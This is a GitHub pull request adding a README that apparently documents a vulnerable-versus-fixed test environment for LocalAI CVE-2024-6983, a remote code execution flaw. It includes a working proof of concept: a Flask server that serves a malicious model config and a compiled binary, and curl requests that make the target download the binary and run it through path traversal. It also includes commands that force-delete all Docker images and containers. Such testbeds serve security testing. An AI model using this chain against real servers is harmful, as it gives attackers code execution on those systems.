Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CVE-2024-6983 #109

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

Add CVE-2024-6983 #109

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
86 changes: 86 additions & 0 deletions mudler/localai/CVE-2024-6983/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,86 @@
# Mudler/LocalAI CVE-2024-6983

This directory contains the deployment config for LocalAI instances vulnerable and fixed to CVE-2024-6983. LocalAI versions below 2.19.4 are vulnerable to that remote code execution vulnerability.

## How to Trigger the Vulnerability?

To trigger the vulnerability, you can use the following two curl commands and the provided Python Script. You may need to install Flask and PyInstaller via pip. Since this vulnerability requires hosting a YAML and an ELF file, the provided Python script will host these files. In a vulnerable environment, after the second curl request, you can see the created file under the /tmp/ directory.

Python Script:

```
from flask import Flask,send_file,request
import tempfile
import PyInstaller.__main__
import os

app=Flask(__name__)

CONF="""name: "life"

download_files:
- filename: "app.bin"
uri: "{0}app.bin"
"""

# Builds exploit code
def build():
CODE = 'open("/tmp/test.txt","a").write("1337")' # Python code we want to run
appname="app.bin"
if os.path.isfile(appname):
return appname
with tempfile.NamedTemporaryFile(delete=False) as fp:
fp.write(CODE.encode())
fp.close()
PyInstaller.__main__.run(["--onefile","--clean","--workpath","/tmp/build/","--specpath","/tmp","--distpath",".","-n",appname,fp.name])
return appname

# Serve model.yaml file
@app.get("/model.yaml")
def model():
return CONF.format(request.root_url)

# Serve app.bin file
@app.get("/app.bin")
def files():
return send_file(build())

# Start the server
app.run("0.0.0.0",8000)
```

Curl Requests:

```
# Run above Python script first.
python server.py

# Upload the yaml and compiled Python file
curl http://localhost:8080/models/apply -X POST -H "Content-Type: application/json" -d '{"name":"life","config_url":"http://localhost:8000/model.yaml","id":""}'

# Trigger the uploaded app.bin file via the backend parameter.
curl http://localhost:8080/embeddings -X POST -H "Content-Type: application/json" -d '{"backend":"../../../../../../build/models/app.bin","model":"life","input":"hi"}'

# Validate the created file by checking the docker inside.
docker exec -it local-ai bash --> ls /tmp/
```

In case you cannot trigger the vulnerability, you might need to delete your existing container images because Docker might try to reuse them.

```
sudo docker rmi -f $(sudo docker images -aq)
sudo docker remove $(sudo docker ps -a -q)
```
## Fixed version
```
docker run -p 8080:8080 -e "DEBUG=true" --name local-ai --network host -ti localai/localai:v2.19.4-ffmpeg-core
```

The deployed service listens on `localhost:8080` after the docker completes its job.

## Vulnerable version
```
docker run -p 8080:8080 -e "DEBUG=true" --name local-ai --network host -ti localai/localai:v2.14.0-ffmpeg-core
```

The deployed service listens on `localhost:8080` after the docker completes its job.